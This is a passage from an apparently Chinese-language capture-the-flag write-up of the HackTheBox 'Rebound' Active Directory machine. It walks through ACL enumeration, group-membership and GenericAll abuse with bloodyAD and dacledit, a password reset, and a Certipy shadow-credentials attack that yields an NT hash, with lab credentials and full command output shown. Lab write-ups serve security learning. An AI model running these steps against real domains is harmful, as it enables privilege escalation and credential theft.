ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : Group
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE, OBJECT_INHERIT_ACE
AccessMask : ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess, ReadProperty, WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT
ObjectAceType : Private-Information
InheritanceType : None
SecurityIdentifier : Principal Self

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\Enterprise Admins

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ListChildObjects
AccessMask : ListChildObjects
InheritanceType : None
SecurityIdentifier : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
ActiveDirectoryRights : ReadAndExecute
AccessMask : ReadAndExecute
InheritanceType : None
SecurityIdentifier : Administrators

发现其中的这个 ServiceMgmt 是在 Service Users 这个 OU 中的。

1
2
3
4
5
6
7
8
ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID : []
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : FullControl
InheritanceType : None
SecurityIdentifier : REBOUND\ServiceMgmt

我们再查找这个 OU 有什么能力。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObject -SearchBase "OU=Service Users,DC=rebound,DC=htb"
objectClass : top
person
organizationalPerson
user
cn : batch_runner
distinguishedName : CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 13:33:02 (today)
uSNCreated : 69335
uSNChanged : 185426
name : batch_runner
objectGUID : {fa00c3b6-5e6a-48b9-9fe0-897389addf60}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 1
codePage : 0
countryCode : 0
badPasswordTime : 04/04/2025 12:32:25 (today)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 09/04/2023 10:22:12 (1 year, 11 months ago)
logonHours : ////////////////////////////
pwdLastSet : 04/04/2025 13:33:00 (today)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7685
accountExpires : 1601-01-01 00:00:00+00:00
logonCount : 11
sAMAccountName : batch_runner
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601
lastLogonTimestamp : 09/04/2023 10:07:10 (1 year, 11 months ago)

objectClass : top
person
organizationalPerson
user
cn : winrm_svc
distinguishedName : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 13:33:02 (today)
uSNCreated : 69329
memberOf : CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
uSNChanged : 185427
name : winrm_svc
objectGUID : {e3c7114f-5864-4115-b3fb-4587e25790f5}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
codePage : 0
countryCode : 0
badPasswordTime : 04/04/2025 12:32:25 (today)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 04/04/2025 13:06:15 (today)
logonHours : ////////////////////////////
pwdLastSet : 04/04/2025 13:33:00 (today)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7684
accountExpires : 1601-01-01 00:00:00+00:00
logonCount : 4
sAMAccountName : winrm_svc
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601
lastLogonTimestamp : 04/04/2025 12:54:09 (today)

objectClass : top
organizationalUnit
ou : Service Users
distinguishedName : OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 13:33:03 (today)
uSNCreated : 69325
uSNChanged : 185428
name : Service Users
objectGUID : {fc826af9-06f9-47e7-866e-4c3c015638b8}
objectCategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601

这个具有 winrm_svc 和 batchrunner 这两个比较突出的 cn(Common Name)。猜测可以执行 batch 和 winrm 登录。

然后查找 winrm_svc 所在的组。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainGroup -MemberIdentity "winrm_svc"
cn : Remote Management Users
description : Members of this group can access WMI resources over management protocols (such as WS-Management via
the Windows Remote Management service). This applies only to WMI namespaces that grant access to the
user.
member : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
distinguishedName : CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
instanceType : 4
name : Remote Management Users
objectGUID : {263ebfb8-61f1-4f04-97d1-c0e7399e85c8}
objectSid : S-1-5-32-580
sAMAccountName : Remote Management Users
sAMAccountType : SAM_ALIAS_OBJECT
groupType : -2147483643
objectCategory : CN=Group,CN=Schema,CN=Configuration,DC=rebound,DC=htb

确实能从 5985 进行远程登录。

于是我们在这里尝试让 oorend 进组 ServiceMgmt。但在此之前先看下组里面的成员。发现有两个一个是 ppaul,一个是 fflock

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainGroupMember -Identity "ServiceMgmt"
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : ppaul
MemberDistinguishedName : CN=ppaul,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-1951

GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : fflock
MemberDistinguishedName : CN=fflock,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-3382

然后加组。

1
2
3
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity "ServiceMgmt" -Members "oorend"
[2025-04-04 15:06:49] User oorend successfully added to ServiceMgmt

在此运行查看组成员发现有三个了,添加成功。

而且因为 oorend 有 Service Users 的完全控制权。可以给 oorend 赋予给 OU=Service Users 的全部权限。给 oorend 赋予 GenericAll 权限。(在 Active Directory 中,GenericAll 是最高的权限级别,等同于”完全控制”,拥有该权限的用户(如 oorend)可以对目标对象(如 OU=Service Users)执行所有操作,包括创建/删除对象、修改属性、重置密码、更改 ACL 等。)

这里要用的 bloodyAD 来添加权限。

bloodyAD 添加权限

Home

1
bloodyAD --host 10.10.11.231 -u oorend -p '1GR8t@$$4u' -d bloody add genericAll "OU=Service Users,DC=rebound,DC=htb" "oorend"

提示没有访问权限。是因为这个加组会掉,再执行一次加组就好了。

当然这里也可以用我们最喜欢的 impacket 的 dacledit.py 实现添加。

1
dacledit.py rebound.htb/oorend:'1GR8t@$$4u' -k -dc-ip 10.10.11.231 -action write -rights FullControl -inheritance -principal oorend -target-dn "OU=Service Users,DC=rebound,DC=htb" -use-ldaps

PS:如果这个无法添加,报错INSUFF_ACCESS_RIGHTS就需要注意 oorend 是不是没被添加到 ServiceMgmt 组,或者掉了,重新执行下。

加上了之后我们就可以修改 winrm_svc 的密码。

1
bloodyAD --host 10.10.11.231 -u oorend -p '1GR8t@$$4u' -d bloody set password "winrm_svc" '123qwe!@#'

可能权限会掉,把前面的带着重打一下。

然后这时候尝试 winrm 登录就发现能成功登录了。

影子凭据

Windows Hello 企业版概述

[MS-ADTS]: msDS-KeyCredentialLink

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

但是有没有想过直接修改密码会导致对方的发现,这就需要影子凭据技术(Windows Hello)。可以向msDS-KeyCredentialLink添加凭据,不会在默认 ADUC 中显示,但是在 ADSI Edit、ldap 浏览器这些就可以。

In short, the Shadow Credentials attack is performed by adding a new “Key Credential” to the target account. The Key Credential can then be used with the PKINIT Kerberos extension for authentication.

Certipy’s shadow command has an auto action, which will add a new Key Credential to the target account, authenticate with the Key Credential to retrieve the NT hash and a TGT for the target, and finally restore the old Key Credential attribute.

简而言之,影子凭证攻击是通过向目标账户添加新的 “密钥凭证 “来实现的。然后,该密钥凭证可与 PKINIT Kerberos 扩展一起用于身份验证。

Certipy 的影子命令有一个自动操作,它会向目标账户添加一个新的密钥凭证,使用密钥凭证进行身份验证以获取目标的 NT 哈希值和 TGT,最后恢复旧的密钥凭证属性。

这里要用的 Certipy-AD

1
pipx install certipy-ad

注意执行 shadow Credential 之前要 ntpdate 同步,因为用了 kerberos。

1
certipy shadow auto -account 'winrm_svc' -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -dc-ip 10.10.11.231 -k -target-ip dc01.rebound.htb

提示没有权限,应该是前面加组和加权限掉了,重新执行一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿escorpion)-[~]
└─# certipy shadow auto -account 'winrm_svc' -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -dc-ip 10.10.11.231 -k -target-ip dc01.rebound.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos or SSPI authentication is used. This might fail
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb'
[*] Adding Key Credential with device ID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

这样我们就拿到 NTLM Hash 4469650fd892e98933b4536d2e86e512

bloodhound

bloodhound 一把 🔒

1
bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c All -ns 10.10.11.231

注意如果出现报错很可能是时钟的问题,而且要关闭 vmware 的时间同步(在机器设置里面。)

1
2
apt install ntpdate
sudo ntpdate rebound.htb

或者

1
2
timedatectl set-ntp off
rdate -n [IP of Target]

更新之后虽然有报错,但是可以拿到部分信息。

当然除了用这个 bloodhound-python 也可以用 nxc (NetExec)实现。

1
nxc ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k --bloodhound -c all --dns-server 10.10.11.231

这个相比于前面用的 ldaps,因为加了-k基于 kerberos 协议。

1
nxc ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k --bloodhound -c all --dns-server 10.10.11.231

bloodhound 详细使用

之前只是大致学了下,这里详细来下步骤。导入之后刷新下数据库。

首先搜索你的初始节点,比如我们是从 ldap_monitor 和 oorend 起手的,就搜索它俩,然后把它加到控制列表中。并设置开始节点。

查看从已拥有权限的主体到域管的最短路径。

(这里用 windows 也可以直接连接 Active Directory Users and Computers)

qwinsta 枚举活跃用户

其中这里的 SI 表示的是 Session Indicator 表明有活跃用户。

查询有无活跃用户。

1
2
3
4
*Evil-WinRM* PS C:\Users\winrm_svc> qwinsta
qwinsta.exe : No session exists for *
+ CategoryInfo : NotSpecified: (No session exists for *:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

我们用 evil-winrm 上传上去 RunasCs

https://github.com/antonioCoco/RunasCs

1
upload /root/htb/Rebound/RunasCs.exe

管理工具和登录类型参考 - Windows Server

查看一下登录类型。

用 9 查看登录。

1
2
3
4
5
*Evil-WinRM* PS C:\Users\winrm_svc> .\RunasCs.exe oorend '1GR8t@$$4u' "qwinsta" -l 9

SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console tbrady 1 Active

tbrady 账户有登录 console。

把 PowerView 传上去并导入 :(我才知道不用 Import-Module 用 . 也可以直接导入)

1
2
upload /root/htb/Rebound/PowerView.ps1
. .\PowerView.ps1

SAM 账户名(samaccountname): 这是 Windows 域用户的唯一标识符,通常用于本地登录(如 DOMAIN\samaccountname)。它与 UserPrincipalName(UPN,如 user@domain.com)不同,格式更简短(例如 admin、user1)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
*Evil-WinRM* PS C:\Users\winrm_svc> get-domainuser -identity tbrady


logoncount : 50
badpasswordtime : 4/4/2025 5:32:25 AM
distinguishedname : CN=tbrady,CN=Users,DC=rebound,DC=htb
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 4/4/2025 2:30:48 AM
name : tbrady
objectsid : S-1-5-21-4078382237-1492182817-2568127209-7686
samaccountname : tbrady
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 4/4/2025 9:30:48 AM
instancetype : 4
usncreated : 69346
objectguid : d9ee43f7-de07-42ee-9f51-cd9c1f37e111
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dscorepropagationdata : {8/25/2023 10:05:00 PM, 1/1/1601 12:00:00 AM}
lastlogon : 4/4/2025 6:42:21 AM
badpwdcount : 0
cn : tbrady
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 4/8/2023 9:08:31 AM
primarygroupid : 513
pwdlastset : 4/8/2023 2:08:31 AM
msds-supportedencryptiontypes : 0
usnchanged : 184371

发现 tbrady 刚刚登录过。

查看下其他服务账号(即使查询全部也要加 filter,否则会导致时间过长)

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\winrm_svc> get-adserviceaccount -filter *


DistinguishedName : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
Enabled : True
Name : delegator
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : c9da97ae-5e35-44d2-aa15-114aecdc0caf
SamAccountName : delegator$
SID : S-1-5-21-4078382237-1492182817-2568127209-7687
UserPrincipalName :

查看用户所属组有没有说法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\Users\winrm_svc> get-domainuser -properties samaccountname,memberof

samaccountname memberof
-------------- --------
Administrator {CN=Group Policy Creator Owners,CN=Users,DC=rebound,DC=htb, CN=Domain Admins,CN=Users,DC=rebound,DC=htb, CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb, CN=Schema Admins,CN=Users,DC=rebound,DC=htb...}
Guest CN=Guests,CN=Builtin,DC=rebound,DC=htb
krbtgt CN=Denied RODC Password Replication Group,CN=Users,DC=rebound,DC=htb
ppaul CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
llune
fflock CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
batch_runner
tbrady

当然除了用户,还有 everyone 组。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
*Evil-WinRM* PS C:\Users\winrm_svc> get-domainobjectacl | where-object { $_.SecurityIdentifier -eq "S-1-1-0" }


ObjectDN : DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209
ActiveDirectoryRights : DeleteChild
BinaryLength : 20
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 2
SecurityIdentifier : S-1-1-0
AceType : AccessDenied
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209
ActiveDirectoryRights : ReadProperty
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 16
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=AdminSDHolder,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Administrator,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-500
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Guest,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-501
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32
ActiveDirectoryRights : ReadProperty
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 16
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Administrators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-544
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-4
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-11
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Print Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-550
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Backup Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-551
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Replicator,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-552
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-17
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=DC01,OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1000
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=krbtgt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-502
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

